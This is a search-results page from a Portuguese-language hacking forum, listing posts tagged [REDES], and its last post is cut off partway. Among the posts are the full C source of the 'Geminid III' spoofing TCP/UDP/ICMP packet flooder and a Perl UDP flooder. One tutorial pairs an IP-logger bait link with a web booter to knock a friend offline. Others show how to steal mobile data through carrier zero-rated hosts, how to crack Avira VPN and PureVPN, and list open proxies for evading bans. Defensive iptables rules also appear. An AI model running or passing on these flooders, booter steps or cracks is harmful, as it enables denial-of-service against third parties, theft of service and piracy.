Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

Pesquisar na Comunidade: Mostrando resultados para as tags ''[REDES]''.

  • Pesquisar por Tags

    Digite tags separadas por vírgulas
  • Pesquisar por Autor

Tipo de Conteúdo


Fóruns

  • Anúncios da Administração
    • Regras
    • Avisos
  • Hacking
    • Leaks
    • Malware
    • Exploits
    • Deface
    • Programas
    • DESATUALIZADO
  • Programação
    • Lógica de Programação
    • Linguagens
    • Mobile
    • Linguagem de Marcação
  • Redes
    • DDoS
    • DDoS Mitigation
    • Proxies/VPN
    • Geral
  • Papers
    • Programação
    • Hacking
    • Redes
  • Estudo
    • Grupos de estudo
    • Hardware
    • Software
  • Design
    • Geral
  • Off-Topic
    • Discussões Gerais
    • LeakedLoL
  • Carding/Banking
    • Aprovações
    • Checkers / Testadores
    • Telas
    • DESATUALIZADO

Categorias

  • Files

Encontrado 14 registros

  1. [REDES]

    Se Veio Aqui Menino Curioso sem saber ao menos oque é, vou explicar de uma maneira simples. Já chegou a procurar no youtube como ter internet de graça, nada da certo né?. Vou ensinar um jeito fácil, porém necessita de Ubuntu 14.10 ou maior. Pode tentar em maquina virtual se der avisa. digo ubuntu pois o repositório já vem, então não vai precisar instalar coisas e demora ODEIO. recomendo VPS para ter uma alta Velocidade. isso vai ser um Tópico Extenso Preste Atenção, não tem screenshots, porque não ligo se você errar. Oque preciso. Celular 3G/4G Android 4.0 Superior APK HTTP INJECTOR V55 você acha em qualquer site nem vem pedir PM. (Saiu da Playstore) procura no apkmirror ou em outro lugar. Se Usar VPS Pode usar o eProxy. vamos la abra o Console de seu Linux Vamos Configurar algumas Coisitas (SE TIVER EM VIRTUALBOX DESATIVE O FIREWALL). Use o COMANDO SU digite sua senha Agora Digite apt-get update && apt-get upgrade Depois de terminar. apt-get install squid3 apt-get install OpenSSH Logo Após apt-get install unzip apt-get install unzip Logo Após apt-get install wget Logo Após apt-get install nano Logo Após cd /etc/squid3/ Logo Após rm -v /etc/squid3/squid.conf Logo Após nano /etc/squid3/squid.conf Adicione estas linhas acl url1 url_regex -i 127.0.0.1 acl url2 url_regex -i localhost acl url3 url_regex -i IP VPS acl payload url_regex -i "/etc/squid3/payload.txt" http_access allow url1 http_access allow url2 http_access allow url3 http_access allow payload http_access deny all http_port 8080 http_port 80 http_port 3128 visible_hostname phreaker56 forwarded_for off via off Logo Após E procure a linha: acl url3 url_regex -i IP_DO_VPS Coloque o ipv4 da sua net (se tiver vps va no painel e pegue o ip SSH) Logo Após Salve o arquivo usando CTRL+X e confirmando o nome do arquivo. Reinicie o squid3 com o comando: /etc/init.d/squid3 restart & Logo Após Essa configuração de proxy libera acesso SSH ao próprio VPS usando uma determinada lista de domínios usados em payloads (chamados popularmente de hosts) que está no arquivo payload.txt. Você poderá alterar essa lista de domínio usando o editor nano: nano /etc/squid3/payload.txt Payload Oque é isso?... já vai entender bobão. Logo Após Digite No Local. .claro.com.ar .claro.com.br .claro.com.gt .claro.com.sv .claroideias.com.br .facebook.net .deezer.com .netclaro.com.br .oi.com.br .phreaker56.xyz .speedtest.net .timanamaria.com.br .tim.com.br .vivo.com.br Logo Após salve usando CTRL+X Logo Após nano /etc/ssh/sshd_config Logo Após Procure a linha: Port 22 E adicione este linha logo abaixo: Port 443 Ficando assim: Port 22 Port 443 Logo Após /etc/init.d/ssh restart Para adicionar um usuário é simples, use o comando: useradd nomedousuario passwd nomedousuario Exemplo useradd brasil123 passwd brazil123 AGORA NO HTTP INJECTOR Para conectar ao VPS configure o HTTP Injector conforme abaixo: Proxy Remoto: IP_DO_VPS:8080 Abra os 3 Pontinhos na Esquerda Superior e configure o SSH Host: IP_DO_VPS Porta: 443 Em usuário e senha configure conforme os dados do usuário adicionado no VPS. LEMBRA DA PAYLOAD? ELA VEM AGORA. EXISTEM VARIAS PAYLOADS DE DIFERENTES OPERADORAS, SÃO HOSTS DE QUANDO VOCÊ ESTA SEM CREDITO E ABRE O NAVEGADOR E MESMO ASSIM AQUELE SITE FUNCIONA, COMO EXEMPLO O SITE DE RECARGA DA CLARO, AQUILO SERVE PARA FAZER UMA PAYLOAD, COMO ESTOU FELIZ HOJE VOU DISPONIBILIZAR DA CLARO E DA OI PRA VCS. Payload da Oi CONNECT [host_port]@mundooi.oi.com.br HTTP/1.1[crlf][crlf]CONNECThttp://mundooi.oi.com.br/ [protocol][crlf]Host: mundooi.oi.com.br[crlf]X-Online-Host: mundooi.oi.com.br[crlf][crlf] Cole na parada de payload la do HTTP Injector se não sabe onde fica ele esta em baixo do Iniciar. Payload Claro GET http://minhaclaro.claro.com.br/ HTTP/1.1[crlf]Host: minhaclaro.claro.com.br[crlf][crlf]CONNECT [host_port] [protocol][crlf] [crlf][lf] Não esqueça dos meus Créditos. se não vou acabar com a mordomia. SSH grátis. Veja o Video: https://vid.me/ruDu Quer testar uma Configuração minha? VirusTotal: https://www.virustotal.com/pt/file/a7a66c157941f5d18ef969cb71014c9efe5f6b5f73eae4466e97f4ad79cb2b72/analysis/1477203417/ SE NAO CONECTAR DE PRIMEIRA É PORQUE TEM MUITA GENTE. OBS DESLIGUE O WIFI E LIGUE OS DADOS MÓVEIS. VinykaClaroNova.ehi
  2. [REDES]

    Entre no site do Avira e faça o download da VPN Faça o download dos arquivos para o crack Download, Scan Instale o Avira e execute o .bat (como administrador) dentro do crack (Sinta-se à vontade para ver os comandos dentro dele) Após executar o .bat, vá na pasta onde você instalou o Avira (por padrão C:\Program Files (x86)\Avira\VPN) Mova os 3 arquivos além do .bat para dentro dessa pasta Só executar o Avira normalmente
  3. Nao manja nada de haskiar e quer zuar seu amigo? Seus problemas acabaram! Para começar precisamos apenas de 2 sites. free.ddosweb.com iplogger.org Primeiro ache uma URL de uma imagem que queira mostrar para seu amigo, voce pode achar ela no google images ou em qualquer site, apenas clique com o botao direito do mouse e clique em copiar link/url da ibagem. Depois que tiver a url va ate o site Iplogger.org, logo de cara aparecera seu ip, pais, e sistema operacional, logo embaixo tera uma barrinha, cole sua url ai e depois clique em Generate Link. Agora entre no free.ddosweb.com Em Target Host coloque o IP do seu amigo q caiu no bait. Em target Port coloque 80 Em Method Pode deixar UDP mesmo Clique em Test for 300 Seconds. Ria de seu amigo caindo mais que o vasco. Obs: se o Free.ddosweb.com te direcionar pro Transformice, tente entrar novamente com o msm link "free.ddosweb.com" E desligue o ADblock! @edit nightmare Créditos DDOS - Nerdizinho
  4. [REDES]

    Boa noite à todos. Agora à pouco eu descobri uma VPN pela qual me interessei, no caso, PureVPN (Tem server no Brasil). Com todo bom jeito de brasileiro, fui procurar um método de crackear ela, acabei achando e trazendo para alguns que geralmente têm dúvidas com VPN, etc. Aqui vai um tutorial de como crackear ela Antes de tudo, baixe o Cracklock, que será o software usado para freezar o trial time que a VPN oferece, fazendo assim com que ela fique na versão trial enquanto estiver instalada no seu PC (Vou deixar o scan do Cracklock e do setup da VPN no final do tópico, junto com os downloads). Imagem 1. Agora, baixe o Setup da PureVPN. Instale o PureVPN normalmente. Quando finalizar a instação, crie uma conta com um endereço de e-mail existente, será necessária a verificação. (pode ser com seu endereço de e-mail padrão mesmo, sem problemas) Após entrar na VPN, feche ela completamente, gerenciador de tarefas, barra de aplicativos, etc. Execute o Cracklock, por padrão ele estará assim. Dê dois cliques em "Add Program". Na tela que abrir, à pasta da VPN (C:\Program Files (x86)\PureVPN) e selecione o executável (purevpn.exe) Depois na outra tela que abrir, marque a opção "Freeze date and time", "Apply" e em seguida "Ok". Imagem 2. Pronto, agora é só abrir a VPN normalmente, selecionar o modo de uso em "Security / Privacy" e conectar no servidor desejado. Scans CrackLock Setup VPN Downloads CrackLock PureVPN
  5. [REDES]

    Um bash com algumas regras básicas do iptables. Leia antes de usar. #!/bin/bash echo "Bloquear TraceRoute obs : colocar sua interface de rede apos o -i Ex ppp0 wlan0 eth0 lo ..." iptables -A INPUT -p udp -s 0/0 -i ppp0 --dport 33435:33525 -j DROP echo "Block TCP-CONNECT scan attempts (SYN bit packets)" iptables -A INPUT -p tcp --syn -j DROP echo "Block TCP-SYN scan attempts (only SYN bit packets)" iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH SYN -j DROP echo "Block TCP-FIN scan attempts (only FIN bit packets)" iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN -j DROP echo "Block TCP-ACK scan attempts (only ACK bit packets)" iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH ACK -j DROP #echo "Block TCP-NULL scan attempts (packets without flag)" #iptables -A INPUT -m conntrack --ctstate INVALID -p tcp --tcp-flags ! SYN,RST,ACK,FIN,URG,PSH SYN,RST,ACK,FIN,URG,PSH -j DROP echo "Block "Christmas Tree" TCP-XMAS scan attempts (packets with FIN, URG, PSH bits)" iptables -A INPUT -m conntrack --ctstate NEW -p tcp --tcp-flags SYN,RST,ACK,FIN,URG,PSH FIN,URG,PSH -j DROP echo "Block DOS - Ping Da Morte" iptables -A INPUT -p ICMP --icmp-type echo-request -m length --length 60:65535 -j ACCEPT #iptables -A FORWARD -p icmp --icmp-type echo-request -m connlimit --connlimit 1/s -j accept iptables -A FORWARD -p icmp --icmp-type echo-request -j DROP echo "Block DOS - Teardrop" iptables -A INPUT -p UDP -f -j DROP echo "Block DDOS - SYN-flood" iptables -A INPUT -p TCP --syn -m connlimit --connlimit-above 9 -j DROP echo "Block DDOS - Smurf" iptables -A INPUT -m pkttype --pkt-type broadcast -j DROP #iptables -A INPUT -p ICMP --icmp-type echo-request -m pkttype --pkttype broadcast -j DROP iptables -A INPUT -p ICMP --icmp-type echo-request -m limit --limit 3/s -j ACCEPT iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j ACCEPT echo "Block DDOS - UDP-flood (Pepsi)" iptables -A INPUT -p UDP --dport 7 -j DROP iptables -A INPUT -p UDP --dport 19 -j DROP echo "Block DDOS - SMBnuke" iptables -A INPUT -p UDP --dport 135:139 -j DROP iptables -A INPUT -p TCP --dport 135:139 -j DROP echo "Block DDOS - Connection-flood" iptables -A INPUT -p TCP --syn -m connlimit --connlimit-above 3 -j DROP echo "Block DDOS - Fraggle" iptables -A INPUT -p UDP -m pkttype --pkt-type broadcast -j DROP iptables -A INPUT -p UDP -m limit --limit 3/s -j ACCEPT echo "Block DDOS - Jolt" iptables -A INPUT -p ICMP -f -j DROP echo "Bloquear NetBus" iptables -A INPUT -p tcp --dport 12345:12346 -j DROP iptables -A INPUT -p udp --dport 12345:12346 -j DROP echo "Contra Port Scanners" iptables -A INPUT -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT echo "Bloquear Back Orifice" iptables -A INPUT -p tcp --dport 31337 -j DROP iptables -A INPUT -p udp --dport 31337 -j DROP #Esta comentado pois como se pode ver ele bloqueia certas ranges então cuidado echo "Bloqueio De Pacotes FragMentados / invalidos" #Bloqueando pacotes fragmentados #iptables -A INPUT -i ppp0 -m unclean -j log_unclean #iptables -A INPUT -f -i ppp0 -j log_fragment #invalidos iptables -A INPUT -m state --state INVALID -j DROP iptables -A FORWARD -m state --state INVALID -j DROP iptables -A OUTPUT -m state --state INVALID -j DROP echo "Protecoes contra ataques" #Protecoes contra ataques iptables -A INPUT -m state --state INVALID -j DROP echo "Bloqueio De Algumas TTLs |g3m|T50" iptables -I INPUT -p icmp -i eth0 -m ttl --ttl-gt 160 -j DROP iptables -I INPUT -p udp -i eth0 -m ttl --ttl-gt 160 -j DROP iptables -I INPUT -p tcp -i eth0 -m ttl --ttl-gt 160 -j DROP echo "Drop excessive RST packets to avoid smurf attacks" iptables -A INPUT -p tcp -m tcp --tcp-flags RST RST -m limit --limit 2/second --limit-burst 2 -j ACCEPT echo "slowloris mitigation" iptables -I INPUT -p tcp -m state --state NEW --dport 80 -m recent \ --name slowloris --set iptables -I INPUT -p tcp -m state --state NEW --dport 80 -m recent \ --name slowloris --update --seconds 15 --hitcount 10 -j DROP iptables -A INPUT -p tcp --dport 80 -j ACCEPT echo "block icmp" iptables -I INPUT -p ICMP --icmp-type 8 -j REJECT iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP iptables -A OUTPUT -p icmp --icmp-type 8 -j DROP
  6. [REDES]

    Como compilar: gcc g3m.c -o g3m /* * Geminid III. TCP/UDP/ICMP Packet flooder * * * Usage: geminid [-T -U -I -N -s -h -d -p -q -l -t] * * -T TCP attack [0:ACK, 1:FIN, 2:RST, 3:SYN] (no default ) * -U UDP attack (no options ) * -I ICMP attack (no options ) * -N Bogus No flag attack (no options ) * -s source class/ip (defaults to random ) * -h destination host/ip (no default ) * -d destination class (no default ) * -p destination port range [start,end] (defaults to random ) * -q source port range [start,end] (defaults to random ) * -l % of box link to use (defaults to 100% ) * -t timeout (defaults to forever) * * * Compiling * * Default: * % gcc g3m.c -o g3m * * With password file option: * % gcc -DF_PASS geminid.c -o geminid * * by LIVE * GEM III - ChinaTown */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <netdb.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <fcntl.h> #include <time.h> #include <signal.h> #ifdef F_PASS #include <sys/stat.h> #endif #include <netinet/in_systm.h> #include <sys/socket.h> #include <string.h> #include <time.h> #ifndef __USE_BSD # define __USE_BSD #endif #ifndef __FAVOR_BSD # define __FAVOR_BSD #endif #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <netinet/udp.h> #include <netinet/ip_icmp.h> #include <arpa/inet.h> #ifdef LINUX # define FIX(x) htons(x) #else # define FIX(x) (x) #endif /* Geminid attack flags */ #define TCP_ACK 1 #define TCP_FIN 2 #define TCP_SYN 4 #define TCP_RST 8 #define UDP_CFF 16 #define ICMP_ECHO_G 32 #define TCP_NOF 64 /* -N */ /* No flag attack */ #define TH_NOF 0x0 #define TCP_ATTACK() (a_flags & TCP_ACK ||\ a_flags & TCP_FIN ||\ a_flags & TCP_SYN ||\ a_flags & TCP_RST ||\ a_flags & TCP_NOF) #define UDP_ATTACK() (a_flags & UDP_CFF) #define ICMP_ATTACK() (a_flags & ICMP_ECHO_G) #define CHOOSE_DST_PORT() dst_sp == 0 ?\ random () :\ htons(dst_sp + (random() % (dst_ep -dst_sp +1))); #define CHOOSE_SRC_PORT() src_sp == 0 ?\ random () :\ htons(src_sp + (random() % (src_ep -src_sp +1))); #define SEND_PACKET() if (sendto(rawsock,\ &packet,\ (sizeof packet),\ 0,\ (struct sockaddr *)&target,\ sizeof target) < 0) {\ perror("sendto");\ exit(-1);\ } /* Linux / SunOS x86 / FreeBSD */ //#define BANNER_CKSUM 54018 /* SunOS Sparc */ #define BANNER_CKSUM 723 u_long lookup(const char *host); unsigned short in_cksum(unsigned short *addr, int len); static void inject_iphdr(struct ip *ip, u_char p, u_char len); char *class2ip(const char *class); static void send_tcp(u_char th_flags); static void send_udp(u_char garbage); static void send_icmp(u_char garbage); char *get_plain(const char *crypt_file, const char *xor_data_key); static void usage(const char *argv0); u_long dstaddr; u_short dst_sp, dst_ep, src_sp, src_ep; char *src_class, *dst_class; /* u_char rseed[4096]; int a_flags, rawsock, rsi; */ int a_flags, rawsock; struct sockaddr_in target; /* Self promotion :) */ const char *banner = "Geminid III. by ChinaTown [TCP/UDP/ICMP Packet flooder]"; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct { int gv; /* valor geminid */ int kv; /* valor Kernel */ void (*f)(u_char); } a_list[] = { /* TCP */ { TCP_ACK, TH_ACK, send_tcp }, { TCP_FIN, TH_FIN, send_tcp }, { TCP_SYN, TH_SYN, send_tcp }, { TCP_RST, TH_RST, send_tcp }, { TCP_NOF, TH_NOF, send_tcp }, /* No flag */ /* UDP */ { UDP_CFF, 0, send_udp }, /* ICMP */ { ICMP_ECHO_G, ICMP_ECHO, send_icmp }, { 0, 0, (void *)NULL }, }; int main(int argc, char *argv[]) { int n, i, on = 1; int b_link; #ifdef F_PASS struct stat sb; #endif unsigned int until; a_flags = dstaddr = i = 0; dst_sp = dst_ep = src_sp = src_ep = 0; until = b_link = -1; src_class = dst_class = NULL; while ( (n = getopt(argc, argv, "T:UINs:h:d:p:q:l:t:")) != -1) { char *p; switch (n) { case 'T': /* TCP attack * * 0: ACK * 1: FIN * 2: RST * 3: SYN */ switch (atoi(optarg)) { case 0: a_flags |= TCP_ACK; break; case 1: a_flags |= TCP_FIN; break; case 2: a_flags |= TCP_RST; break; case 3: a_flags |= TCP_SYN; break; } break; case 'U': /* UDP attack */ a_flags |= UDP_CFF; break; case 'I': /* ICMP attack */ a_flags |= ICMP_ECHO_G; break; case 'N': /* Bogus No flag attack (TCP) */ a_flags |= TCP_NOF; break; case 's': src_class = optarg; break; case 'h': dstaddr = lookup(optarg); break; case 'd': dst_class = optarg; i = 1; /* neat flag to check command line later */ break; case 'p': if ( (p = (char *) strchr(optarg, ',')) == NULL) usage(argv[0]); dst_sp = atoi(optarg); /* Destination start port */ dst_ep = atoi(p +1); /* Destination end port */ break; case 'q': if ( (p = (char *) strchr(optarg, ',')) == NULL) usage(argv[0]); src_sp = atoi(optarg); /* Source start port */ src_ep = atoi(p +1); /* Source end port */ break; case 'l': b_link = atoi(optarg); if (b_link <= 0 || b_link > 100) usage(argv[0]); break; case 't': until = time(0) +atoi(optarg); break; default: usage(argv[0]); break; } } /* Checking command line */ if ( (!dstaddr && !i) || (dstaddr && i) || (!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) || (src_sp != 0 && src_sp > src_ep) || (dst_sp != 0 && dst_sp > dst_ep)) usage(argv[0]); srandom(time(NULL) ^ getpid()); /* Opening RAW socket */ if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(-1); } if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(-1); } /* Filling target structure */ target.sin_family = AF_INET; /* Packeting! */ for (n = 0; ; ) { /* Poor link control handling */ if (b_link != -1 && random() % 100 +1 > b_link) { if (random() % 200 +1 > 199) usleep(1); continue; } /* Sending requested packets */ for (i = 0; a_list[i].f != NULL; ++i) { if (a_list[i].gv & a_flags) a_list[i].f(a_list[i].kv); } /* Attack is finished? Do not check it every time, would eat * too much CPU */ if (n++ == 100) { if (until != -1 && time(0) >= until) break; n = 0; } } exit(0); } u_long lookup(const char *host) { struct hostent *hp; if ( (hp = gethostbyname(host)) == NULL) { perror("gethostbyname"); exit(-1); } return *(u_long *)hp->h_addr; } #define RANDOM() (int) random() % 255 +1 char * class2ip(const char *class) { static char ip[16]; int i, j; for (i = 0, j = 0; class[i] != '\0'; ++i) if (class[i] == '.') ++j; switch (j) { case 0: sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM()); break; case 1: sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM()); break; case 2: sprintf(ip, "%s.%d", class, RANDOM()); break; /* Spoofing single host */ default: strncpy(ip, class, 16); break; } return ip; } unsigned short in_cksum(unsigned short *addr, int len) { int nleft = len; int sum = 0; unsigned short *w = addr; unsigned short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* * Mop up an odd byte, if necessary */ if (nleft == 1) { *(unsigned char *) (&answer) = *(unsigned char *)w; sum += answer; } /* * Add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); answer = ~sum; return answer; } /* * Creating generic ip header, not yet ready to be used. */ static void inject_iphdr(struct ip *ip, u_char p, u_char len) { /* Filling IP header */ ip->ip_hl = 5; ip->ip_v = 4; ip->ip_p = p; ip->ip_tos = 0x0; /* 0x0 */ ip->ip_id = random(); ip->ip_len = 15; ip->ip_off = 0; ip->ip_ttl = 133; ip->ip_dst.s_addr = dst_class != NULL ? inet_addr(class2ip(dst_class)) : dstaddr; ip->ip_src.s_addr = src_class != NULL ? inet_addr(class2ip(src_class)) : random(); /* I know, this is not part of the game, but anyway.. */ target.sin_addr.s_addr = ip->ip_dst.s_addr; } static void send_tcp(u_char th_flags) { struct cksum cksum; struct packet { struct ip ip; struct tcphdr tcp; } packet; /* Filling IP header */ memset(&packet, 0, sizeof packet); inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet)); packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); /* Filling cksum pseudo header */ cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); cksum.pseudo.saddr = packet.ip.ip_src.s_addr; /* Filling TCP header */ packet.tcp.th_flags = 0; packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = rand(); packet.tcp.th_flags = th_flags; packet.tcp.th_off = 5; packet.tcp.th_urp = 0; packet.tcp.th_sport = CHOOSE_SRC_PORT(); packet.tcp.th_dport = CHOOSE_DST_PORT(); cksum.tcp = packet.tcp; packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); SEND_PACKET(); } static void send_udp(u_char garbage) /* No use for garbage here, just to remain */ { /* coherent with a_list[] */ struct packet { struct ip ip; struct udphdr udp; } packet; /* Filling IP header */ memset(&packet, 0, sizeof packet); inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet)); packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); /* Filling UDP header */ packet.udp.uh_sport = CHOOSE_SRC_PORT(); packet.udp.uh_dport = CHOOSE_DST_PORT(); packet.udp.uh_ulen = htons(sizeof packet.udp); packet.udp.uh_sum = random(); /* No checksum */ SEND_PACKET(); } /* realrand (int low, int high) { int evil[2]; evil[0] = rseed[rsi]; evil[1] = rseed[rsi + 1]; rsi += 2; if (evil[0] == 0x00) evil[0]++; if (evil[1] == 0x00) evil[1]++; srandom (time (0)); srand (random () << pid % evil[0] >> evil[1]); return ((rand () % (int) (((high) + 1) - (low))) + (low)); } int tiposicmp[14] = { 0, 1, 2, 4, 6, 8, 12, 17, 22, 41, 58, 255, 0, }; */ static void send_icmp(u_char gargabe) /* Garbage discarded again.. */ { struct packet { struct ip ip; struct icmp icmp; } packet; /* tiposicmp[13] = rand (0, 255); */ /* Filling IP header */ memset(&packet, 0, sizeof packet); inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet)); packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); /* Filling ICMP header */ packet.icmp.icmp_type = ICMP_ECHO; packet.icmp.icmp_code = 0; packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8)); SEND_PACKET(); } static void usage(const char *argv0) { printf("%s \n", banner); printf("Usage: %s [-T -U -I -N -s -h -d -p -q -l -t]\n\n", argv0); printf("REGISTERED TO: seilaqm..\n\n"); printf(" -T TCP attack [0:ACK, 1:FIN, 2:RST, 3:SYN] (no default )\n"); printf(" -U UDP attack (no options )\n"); printf(" -I ICMP attack (no options )\n"); printf(" -N Bogus No flag attack (no options )\n"); printf(" -s source class/ip (defaults to random )\n"); printf(" -h destination host/ip (no default )\n"); printf(" -d destination class (no default )\n"); printf(" -p destination port range [start,end] (defaults to random )\n"); printf(" -q source port range [start,end] (defaults to random )\n"); printf(" -l %% of box link to use (defaults to 100%% )\n"); printf(" -t timeout (defaults to forever)\n"); exit(-1); }
  7. **Não sei se está no tópico certo, se não estiver, algum mod por favor mova-o. Grato! 1º -> Utilizaremos 2 sites, o próprio MEGA (mega.nz) e o MultCloud (multcloud.com). 2º-> Clique no link no qual você quer fazer o download do arquivo no MEGA (Nesse tutorial estarei usando a pasta de C# + Unity 5 do @Chainksain). 3º-> Clique em "Importar para minha nuvem de arquivos" 4º-> Quando o arquivo já estiver em sua nuvem, vá para o site do MultCloud e clique em Sign Up para registrar-se. 5º-> Feito o registro, você irá entrar em sua conta e você verá essa tela, clique em "Add Clouds". 6º-> Procure por MEGA, selecione, clique em "Next", entre na sua conta do MEGA e clique em "Add MEGA Cloud". 7º-> Clique 2x na(s) pasta(s) que você adicionou. 8º-> Selecione com o botão direito um arquivo e clique em "Download". Pronto! Agora você pode baixar qualquer arquivo que vem do MEGA e/ou outros serviços de nuvem sem mexer com VPN. ** O contra desse método é que você terá que selecionar e baixar um por um, sendo que o MultCloud permite fazer o download de somente 5 arquivos simultaneamente.
  8. [REDES]

    Olá, Para não ficarem postando combolist de proxy, que é um pouco desnecessário, deixo uma lista de sistes que contém proxys funcionais e atualizados sempre, que especifica país, tipo, etc . https://www.sslproxies.org/ https://incloak.com/proxy-list/ http://free-proxy-list.net/ http://www.gatherproxy.com/ http://proxylist.hidemyass.com/ https://hide.me/pt/proxy http://www.newipnow.com/ http://sslproxies24.blogspot.com.br https://proxyrox.com/ By
  9. [REDES]

    Não sei se to no tópico certo, se ta no errado pode excluir sem problema Alguem sabe me dizer se tem como driblar o sistema de verificacao de conta da steam, aquele que aparece toda vez que você faz login em um computador novoInserir outra mídia
  10. [REDES]

    Aproveitem Oque é proxies? (IP + porta) Quano você faz um scan um checker com alguma ferramente que tenha o opção (PROXIES). Os site/serves podem banir seu ip com proxys cada vez que um IP é banido entra outro no lugar fazendo que seu scan checker etc dure muito mais. list: 89.40.115.190:3128 58.27.217.75:3128 54.169.8.83:8080 47.89.8.180:80 52.27.128.214:3128 45.63.12.96:32205 36.81.253.196:3128 52.66.143.86:3128 47.88.195.233:3128 36.82.104.45:80 41.242.90.3:8080 94.20.21.38:3128 77.120.102.84:3128 36.81.48.227:8080 112.196.1.195:3128 89.149.24.188:8080 122.154.146.218:3128 103.28.149.118:3128 94.177.164.72:80 103.252.194.100:8080 128.199.127.59:8080 130.237.37.68:3128 128.199.89.209:8080 186.27.126.130:80 185.28.193.95:8080 177.135.200.146:3128 137.135.166.225:8143 186.232.31.60:3128 187.11.201.236:3128 190.18.194.149:8080 186.177.17.131:8080 176.106.145.122:8080 181.211.253.202:3128 125.141.200.12:80 125.141.200.14:80 125.141.200.15:80 125.141.200.51:80 125.141.200.53:80 125.141.200.34:80 125.141.200.39:80 125.141.200.44:80 125.141.200.21:80 125.141.200.25:80 125.141.200.3:80 125.141.200.6:80 125.141.200.11:80 187.44.1.167:8080 190.202.116.101:3128 194.58.107.101:8118 182.253.154.83:8080 180.250.248.78:80 125.141.200.46:80 193.242.211.156:443 197.5.128.1:8080 213.16.167.147:80 213.171.46.186:3128 201.90.120.194:3128 203.82.93.135:80 200.123.138.229:8080 200.149.126.202:8080 200.150.118.4:80 202.69.40.173:8080 202.53.168.125:8080 203.172.181.253:8080 Créditos: Eletroplus
  11. [REDES]

    Identificando intrusos na sua rede wireless com nmap Para ver quem está conectado a sua rede Wireless, isso é muito importante saber, pois só assim você vai ter o controle, é importante anotar os endereços MAC dos clientes ativos em sua rede para ter o controle você terá também acesso ao endereço IP mais ele muda toda hora o MAC não muda. COMANDO: Para para ver seu IP interno: ifconfig Para usar no nmap: nmap IP/24 Para saber o IP do seu roteador "Gateway": route -n Créditos: Eletroplus
  12. [REDES]

    Um udp flooder feito em perl para estudo dos iniciantes #!/usr/bin/perl use io::socket; $ARGC = @ARGV; if ($ARGC != 2) { print("Usage: $0 host port \n"); exit(1); } ($host, $port) = @ARGV; $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => "udp") || die "$! Could not create sock"; packets: while (1) { $size = rand() * rand() * rand(); print ("flooding $host on the $port port and size is $size\n"); send($sock, 0, $size); }
  13. [REDES]

    ### 1: Drop invalid packets ### /sbin/iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP ### 2: Drop TCP packets that are new and are not SYN ### /sbin/iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP ### 3: Drop SYN packets with suspicious MSS value ### /sbin/iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP ### 4: Block packets with bogus TCP flags ### /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN,RST,PSH,ACK,URG NONE -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,FIN FIN -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL ALL -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP /sbin/iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL 